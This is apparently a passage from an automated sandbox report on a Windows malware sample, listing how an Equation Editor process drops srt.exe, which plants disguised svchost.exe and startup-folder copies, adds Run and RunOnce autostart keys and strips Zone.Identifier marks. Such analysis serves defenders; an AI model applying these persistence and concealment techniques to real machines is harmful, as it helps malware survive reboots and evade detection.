                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 31_2_001C30CD push esp; retf 0014h31_2_001C311D
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 31_2_001C1B78 push esp; retf 0014h31_2_001C1B81

                      Persistence and Installation Behavior:

                      barindex
                      Drops PE files with benign system namesShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeJump to dropped file
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\srt.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Creates an autostart registry key pointing to binary in C:\WindowsShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Creates multiple autostart registry keysShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt
                      Drops PE files to the startup folderShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78dJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt
                      Source: C:\Users\user\AppData\Roaming\srt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run qweruiuyt

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeFile opened: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
